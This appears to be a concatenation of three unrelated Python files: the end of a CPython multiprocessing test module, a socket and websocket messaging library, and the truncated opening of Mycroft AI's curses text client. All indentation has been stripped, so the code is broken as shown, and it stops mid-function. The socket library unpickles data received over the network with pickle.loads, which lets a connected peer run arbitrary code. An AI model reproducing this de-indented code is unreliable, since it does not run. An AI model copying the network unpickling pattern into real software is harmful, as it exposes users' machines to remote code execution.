# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
__init__.py
|
import struct, socket, threading, json, os, pickle
from essentials import tokening
import essentials
import copy
import time
from hashlib import sha1
import base64
import time
import six
PYTHONIC = "python based"
WEBONIC = "web based"
LEGACY = "legacy"
def SocketDownload(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
payload_size = struct.calcsize(">L")
while len(data) < payload_size:
data += sock.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(data) < msg_size:
data += sock.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
if usage != None:
usage.add(len(frame_data))
try:
xData = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
return xData, data
except:
print("EOF Error Caught.")
except Exception as e:
raise ConnectionError("Connection Error:", e)
def SocketUpload(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
data = pickle.dumps(data, 0)
frame = struct.pack(">L", len(data)) + data
if usage != None:
usage.add(len(frame))
sock.sendall(frame)
except:
raise ConnectionError("Connection Error")
def Encode_WebSocket_Message(data="", mask=0):
if isinstance(data, six.text_type):
data = data.encode('utf-8')
length = len(data)
fin, rsv1, rsv2, rsv3, opcode = 1, 0, 0, 0, 0x1
frame_header = chr(fin << 7 | rsv1 << 6 | rsv2 << 5 | rsv3 << 4 | opcode)
if length < 0x7e:
frame_header += chr(mask << 7 | length)
frame_header = six.b(frame_header)
elif length < 1 << 16:
frame_header += chr(mask << 7 | 0x7e)
frame_header = six.b(frame_header)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(mask << 7 | 0x7f)
frame_header = six.b(frame_header)
frame_header += struct.pack("!Q", length)
return frame_header + data
def SocketUpload_WebBased(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
if type(data) != type(b""):
print("WARNING: Web Sockets allow byte like data. Make sure your data is encoded next time.")
data = data.encode()
frame = Encode_WebSocket_Message(data)
if usage != None:
usage.add(len(frame))
sock.send(frame)
except Exception as e:
raise ConnectionError("Connection Error: " + str(e))
def HostServer(HOST, PORT, connections=5, SO_REUSEADDR=True):
"""
Helper function for Socket Classes
"""
PORT = int(os.getenv('PORT', PORT))
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
if SO_REUSEADDR == True:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST,PORT))
sock.listen(connections)
return sock
def ConnectorSocket(HOST, PORT):
"""
Helper function for Socket Classes
"""
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect((HOST, PORT))
return clientsocket
def WebSocket_Decode_Message(data):
"""
Helper function for Socket Classes
"""
data = bytearray(data)
if(len(data) < 6):
raise Exception("Error reading data")
assert(0x1 == (0xFF & data[0]) >> 7)
assert(0x1 == (0xF & data[0]))
assert(0x1 == (0xFF & data[1]) >> 7)
datalen = (0x7F & data[1])
if(datalen > 0):
mask_key = data[2:6]
masked_data = data[6:(6+datalen)]
unmasked_data = [masked_data[i] ^ mask_key[i%4] for i in range(len(masked_data))]
resp_data = bytearray(unmasked_data).decode("utf-8")
else:
resp_data = ""
return resp_data
class Transfer_Record(object):
def __init__(self):
self.sent = Data_Storage()
self.received = Data_Storage()
class Data_Storage(object):
def __init__(self):
self.bytes = 0
self.commits = 0
def add(self, count, unit_type="b"):
if unit_type == "b":
self.bytes += count
elif unit_type == "mb":
self.bytes += (1048576 * count)
elif unit_type == "gb":
self.bytes += (1073741824 * count)
else:
raise ValueError("unit type not found for conversion")
self.commits += 1
@property
def megabytes(self):
return self.bytes * 0.000001
@property
def gigabyte(self):
return self.megabytes * 0.001
class Socket_Server_Host:
def __init__(self, HOST, PORT, on_connection_open, on_data_recv, on_question, on_connection_close=False, daemon=True, autorun=True, connections=5, SO_REUSEADDR=True, heart_beats=True, heart_beat_wait=20, legacy_buffer_size=1024):
"""Host your own Socket server to allows connections to this computer.
Parameters
----------
HOST (:obj:`str`): Your hosting IP Address for this server.
PORT (:obj:`int`): Which port you'd like to host this server on.
on_connection_open (:obj:`def`): The function to call when you get a new connection. Gives Socket_Server_Client Class
on_data_recv (:obj:`def`): The function to call when you receive data from a connection.
on_question (:obj:`def`): The function to call when you receive a question from a connection.
on_connection_close (:obj:`def`, optional): The function to call when a connection is closed.
daemon (:obj:`bool`, optional): If you'd like the server to close when the python file closes or is interrupted.
autorun (:obj:`bool`, optional): Will run the server on init.
connections (:obj:`int`, optional): How many connections to allow at one time. To be used with autorun = True
Attributes
----------
running (:obj:`bool`): Is the server still running.
connections (:obj:`dict`): Holds all connection threads.
on_connection_open (:obj:`def`): Holds the function you specified to use, can be over written. NOTE: Overwriting this will not overwrite old connection values.
on_connection_close (:obj:`def`): Holds the function you specified to use, can be over written. NOTE: Overwriting this will not overwrite old connection values.
on_data_recv (:obj:`def`): Holds the function you specified to use, can be over written. NOTE: Overwriting this will not overwrite old connection values.
"""
self.on_connection_open = on_connection_open
self.on_connection_close = on_connection_close
self.on_data_recv = on_data_recv
self.HOST = HOST
self.PORT = PORT
self.heart_beats = heart_beats
self.heart_beat_wait = heart_beat_wait
self.connections = {}
self.on_question = on_question
self.running = False
self.legacy_buffer_size = legacy_buffer_size
if autorun:
self.Run(connections, daemon, SO_REUSEADDR)
def Run(self, connections=5, daemon=True, SO_REUSEADDR=True):
"""
Will start the server on the specified host, port and listening count.
This setup allows you to shutdown, change, and restart the server.
Parameters
----------
connections (:obj:`int`): How many connections to accept at one time
:rtype: None
"""
self.server = HostServer(self.HOST, self.PORT, connections, SO_REUSEADDR)
self.running = True
self.broker = threading.Thread(target=self.ConnectionBroker, daemon=daemon)
self.broker.start()
def ConnectionBroker(self):
"""
Server background task for accepting connections, you'll not need to use this.
:rtype: None
"""
while self.running:
try:
conn, addr = self.server.accept()
if self.running == False:
conn.close()
return
conID = tokening.CreateToken(12, self.connections)
connector = Socket_Server_Client(conn, addr, conID, self.on_connection_open, self.on_data_recv, on_question=self.on_question, on_close=self.close_connection, Heart_Beat=self.heart_beats, Heart_Beat_Wait=self.heart_beat_wait, legacy_buffer_size=self.legacy_buffer_size)
self.connections[conID] = connector
time.sleep(0.05)
except Exception as e:
self.running = False
raise e
def close_connection(self, connection):
"""
Server background task for clearing connections and notifying the parent file, you'll not need to use this.
:rtype: None
"""
try:
self.on_connection_close(connection)
except:
pass
del self.connections[connection.conID]
def Shutdown(self):
"""
Shutdown the server and close all connections.
:rtype: None
"""
self.running = False
keys = list(self.connections.keys())
for con in keys:
try:
self.connections[con].shutdown()
except:
pass
self.connections = {}
try:
self.server.close()
except:
pass
def CloseConnection(self, conID):
"""
Shortcut to close a certain connection.
Can also be used as Server.connections[conID].shutdown()
:rtype: None
"""
self.connections[conID].shutdown()
class Socket_Server_Client:
def __init__(self, sock, addr, conID, on_connection_open, on_data, on_question, on_close, Heart_Beat=True, Heart_Beat_Wait=20, legacy_buffer_size=1024):
"""CLIENT for Socket_Server_Host"""
self.socket = sock
self.addr = addr
self.conID = conID
self.on_data = on_data
self.on_close = on_close
self.running = True
self.meta = {}
self.recv_data = b""
self.data_usage = Transfer_Record()
self.client_type = None
self.on_question = on_question
self.legacy_buffer_size = legacy_buffer_size
self.__get_next__ = False
self.__ask_list__ = {}
self.created = essentials.TimeStamp()
self.heart_beat_wait = Heart_Beat_Wait
self.heart_beat = Heart_Beat
threading.Thread(target=self.__detect_client_type__, args=[on_connection_open]).start()
def __detect_client_type__(self, on_open):
self.socket.settimeout(2)
while True:
try:
self.recv_data += self.socket.recv(2)
except:
break
if b"PING" in self.recv_data[:7]:
try:
self.socket.send(b"PONG")
except:
pass
self.shutdown()
return
if b"permessage-deflate" in self.recv_data:
self.client_type = WEBONIC
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
msg = self.recv_data.decode("utf-8")
vals = msg.replace("\r", "").split("\n")
headers = {}
for item in vals:
if item != "" and ":" in item:
headers[item.split(":")[0]] = item.split(": ")[1]
self.WEBONIC_headers = headers
key = headers['Sec-WebSocket-Key']
sha1f = sha1()
sha1f.update(key.encode('utf-8') + GUID.encode('utf-8'))
response_key = base64.b64encode(sha1f.digest()).decode('utf-8')
websocket_answer = (
'HTTP/1.1 101 Switching Protocols',
'Upgrade: websocket',
'Connection: Upgrade',
'Sec-WebSocket-Accept: {key}\r\n\r\n',
)
response = '\r\n'.join(websocket_answer).format(key=response_key)
self.socket.send(response.encode('utf-8'))
self.socket.settimeout(0.5)
elif b"pythonic" in self.recv_data:
self.client_type = PYTHONIC
else:
self.socket.settimeout(0.075)
self.client_type = LEGACY
threading.Thread(target=on_open, args=[self]).start()
threading.Thread(target=self.__data_rev__, daemon=True).start()
if self.heart_beat == True and self.client_type == PYTHONIC:
self.socket.setblocking(1)
threading.Thread(target=self.__heart_beat__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.heart_beat_wait)
def shutdown(self):
"""
Shuts down this connection and removes any place it is still stored. Completes the on_close event.
:rtype: None
"""
try:
self.on_close(self)
except:
pass
self.running = False
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
timeout = 0
while self.client_type == None and timeout < 4:
time.sleep(0.01)
timeout += 0.01
if self.client_type == None:
raise ValueError("Couldn't detect Client Type.")
if self.running == False:
raise ConnectionResetError("No Connection")
if self.client_type == PYTHONIC:
try:
SocketUpload(self.socket, data, self.data_usage.sent)
except:
self.shutdown()
elif self.client_type == WEBONIC:
try:
SocketUpload_WebBased(self.socket, data, self.data_usage.sent)
except Exception as e:
print(e)
self.shutdown()
elif self.client_type == LEGACY:
try:
self.socket.sendall(data)
except Exception as e:
print("EXCEPTION:", e)
self.shutdown()
def ask(self, data, timeout=5):
if self.client_type == WEBONIC:
print("WARNING: ask for Web Based Clients is not currently supported.")
return False
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
copyed = copy.deepcopy(self.__ask_list__[tok])
del self.__ask_list__[tok]
return copyed['data']
def get_next(self):
self.__get_next__ = True
self.get_next_data = False
while self.__get_next__ == True:
time.sleep(0.05)
return self.get_next_data
def __data_rev__(self):
"""
Server background task for accepting data and run the on_data event, you'll not need to use this.
:rtype: None
"""
if self.client_type == PYTHONIC:
while self.running:
try:
data, temp = SocketDownload(self.socket, self.recv_data, self.data_usage.received)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and "pythonic" in data:
pass
elif type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
threading.Thread(target=self.on_question, args=[Socket_Question(data['data'], self, data['function_ask_question'])], daemon=True).start()
else:
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.on_data, args=[data, self], daemon=True).start()
time.sleep(0.05)
elif self.client_type == WEBONIC:
while self.running:
msg = b""
conti = True
while conti:
buffer = b""
while b"\n" not in buffer:
try:
buffer += self.socket.recv(1)
except:
conti = False
break
time.sleep(0.01)
msg += buffer
if msg != b"":
self.data_usage.received.add(len(msg))
try:
socket_message = WebSocket_Decode_Message(msg)
except:
pass
try:
socket_message = json.loads(socket_message)
except:
pass
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.on_data, args=[socket_message, self], daemon=True).start()
time.sleep(0.01)
elif self.client_type == LEGACY:
while self.running:
msg = b""
conti = True
while b"\n" not in msg:
try:
msg += self.socket.recv(self.legacy_buffer_size)
except:
conti = False
break
time.sleep(0.01)
if msg != b"":
self.data_usage.received.add(len(msg))
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.on_data, args=[msg, self], daemon=True).start()
time.sleep(0.01)
class Socket_Question(object):
def __init__(self, data, client, tok):
self.data = data
self.questioner = client
self.__answer_token__ = tok
def answer(self, data):
self.questioner.send({"function_ask_response": self.__answer_token__, "data": data})
class Configuration(object):
def __init__(self, default=PYTHONIC, on_data_recv=None, on_question=None, on_connection_close=None):
self.client_type = default
self.heart_beat = True
self.heart_beat_wait = 10
self.legacy_buffer_size = 1024
self.socket_timeout = 0.25
self.on_data_recv = on_data_recv
self.on_question = on_question
self.on_connection_close = on_connection_close
@property
def PYTHONIC(self):
return self.client_type == "python based"
@PYTHONIC.setter
def PYTHONIC(self, value):
if value == True:
self.client_type = "python based"
else:
raise ValueError("Setting value must be True")
@property
def WEBONIC(self):
return self.client_type == "web based"
@WEBONIC.setter
def WEBONIC(self, value):
if value == True:
self.client_type = "web based"
else:
raise ValueError("Setting value must be True")
@property
def LEGACY(self):
return self.client_type == "legacy"
@LEGACY.setter
def LEGACY(self, value):
if value == True:
self.client_type = "legacy"
else:
raise ValueError("Setting value must be True")
class Socket_Connector:
def __init__(self, HOST, PORT, Config=Configuration(PYTHONIC)):
"""Host your own Socket server to allows connections to this computer.
Parameters
----------
HOST (:obj:`str`): The hosting IP Address for the server.
PORT (:obj:`int`): The port the server is using.
Attributes
----------
running (:obj:`bool`): Is the server still running.
on_connection_close (:obj:`def`): Holds the function you specified to use, can be over written.
on_data_recv (:obj:`def`): Holds the function you specified to use, can be over written.
"""
self.running = True
self.HOST = HOST
self.PORT = PORT
self.recv_data = b""
self.data_usage = Transfer_Record()
self.__ask_list__ = {}
self.__get_next__ = False
self.configuration = Config
def get_next(self, timeout=30):
self.__get_next__ = True
self.get_next_data = False
start = 0
while self.__get_next__ == True and self.running == True and start < timeout:
time.sleep(0.05)
start += 0.05
if self.running == False:
raise ConnectionResetError("The connection was closed.")
if start >= timeout:
raise TimeoutError("No response in time.")
return self.get_next_data
def connect(self):
if self.configuration.WEBONIC:
raise NotImplementedError("Websocket Clients Haven't been Implemented Yet.")
self.socket = ConnectorSocket(self.HOST, self.PORT)
if self.configuration.PYTHONIC == True:
self.send({"pythonic": True})
time.sleep(2)
if self.configuration.heart_beat == True:
threading.Thread(target=self.__heart_beat__, daemon=True).start()
elif self.configuration.WEBONIC == True:
self.socket.settimeout(self.configuration.socket_timeout)
elif self.configuration.LEGACY == True:
self.socket.settimeout(self.configuration.socket_timeout)
else:
raise ValueError("No configuration values set.")
threading.Thread(target=self.__data_rev__, daemon=True).start()
def __heart_beat__(self):
while self.running:
self.send({"heart_beat_function": True})
time.sleep(self.configuration.heart_beat_wait)
def ask(self, data, timeout=5):
if self.configuration.PYTHONIC != True:
print("ERROR: Can't ask questions to non-Pythonic connections")
return
tok = essentials.CreateToken(20, self.__ask_list__)
self.__ask_list__[tok] = False
self.send({"function_ask_question": tok, "data": data})
while self.__ask_list__[tok] == False:
time.sleep(0.01)
timeout -= 0.01
if timeout <= 0:
raise TimeoutError("No response within time.")
copyed = copy.deepcopy(self.__ask_list__[tok])
del self.__ask_list__[tok]
return copyed['data']
def send(self, data):
"""
Send data to the remote connection.
:rtype: None
"""
if self.running == False:
raise ConnectionResetError("No Connection")
try:
if self.configuration.LEGACY:
self.socket.sendall(data)
elif self.configuration.PYTHONIC:
SocketUpload(self.socket, data, self.data_usage.sent)
elif self.configuration.WEBONIC:
self.socket.send(data)
except Exception as e:
print(e)
self.shutdown()
def shutdown(self):
"""
Shuts down this connection. Completes the on_close event.
:rtype: None
"""
self.running = False
try:
self.configuration.on_connection_close()
except:
print("WARN: No On Close Function")
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass
try:
self.socket.close()
except:
pass
def __data_rev__(self):
"""
Client background task for accepting data and run the on_data event, you'll not need to use this.
:rtype: None
"""
if self.configuration.LEGACY:
while self.running:
msg = b""
while b"\n" not in msg:
try:
msg += self.socket.recv(self.configuration.legacy_buffer_size)
except Exception as e:
break
time.sleep(0.01)
if msg != b"":
self.data_usage.received.add(len(msg))
if self.__get_next__ == True:
self.get_next_data = msg
self.__get_next__ = False
else:
threading.Thread(target=self.configuration.on_data_recv, args=[msg], daemon=True).start()
time.sleep(0.01)
elif self.configuration.PYTHONIC:
while self.running:
try:
data, temp = SocketDownload(self.socket, self.recv_data, self.data_usage.received)
self.recv_data = temp
except:
self.shutdown()
return
if type(data) == type({}) and 'heart_beat_function' in data:
pass
elif type(data) == type({}) and 'function_ask_response' in data:
self.__ask_list__[data['function_ask_response']] = data
elif type(data) == type({}) and 'function_ask_question' in data:
self.configuration.on_question(Socket_Question(data['data'], self, data['function_ask_question']))
else:
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.configuration.on_data_recv, args=[data], daemon=True).start()
elif self.configuration.WEBONIC:
while self.running:
msg = b""
conti = True
while conti:
buffer = b""
while b"\n" not in buffer:
try:
buffer += self.socket.recv(1)
except:
conti = False
break
time.sleep(0.001)
msg += buffer
if msg != b"":
self.data_usage.received.add(len(msg))
socket_message = msg
try:
socket_message = WebSocket_Decode_Message(socket_message)
except:
pass
try:
socket_message = json.loads(socket_message)
except:
pass
try:
socket_message = socket_message.decode()
except:
pass
if self.__get_next__ == True:
self.get_next_data = data
self.__get_next__ = False
else:
threading.Thread(target=self.configuration.on_data_recv, args=[socket_message], daemon=True).start()
time.sleep(0.01)
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
import xdg.BaseDirectory
from mycroft.client.text.gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars set it to system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
REDRAW_FREQUENCY = 10 # seconds between full redraws
last_redraw = time.time() - (REDRAW_FREQUENCY - 1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
If default locale supports UTF-8 reencode the string otherwise
remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
filename = "mycroft_cli.conf"
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
config_file = None
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if os.path.isfile(path):
LOG.warning(" ===============================================")
LOG.warning(" == DEPRECATION WARNING ==")
LOG.warning(" ===============================================")
LOG.warning(" You still have a config file at " +
path)
LOG.warning(" Note that this location is deprecated and will" +
" not be used in the future")
LOG.warning(" Please move it to " +
os.path.join(xdg.BaseDirectory.save_config_path('mycroft'),
filename))
config_file = path
# Check XDG_CONFIG_DIR
if config_file is None:
for conf_dir in xdg.BaseDirectory.load_config_paths('mycroft'):
xdg_file = os.path.join(conf_dir, filename)
if os.path.isfile(xdg_file):
config_file = xdg_file
break
# Check /etc/mycroft
if config_file is None:
config_file = os.path.join("/etc/mycroft", filename)
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
config_file = os.path.join(
xdg.BaseDirectory.save_config_path("mycroft"), filename)
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
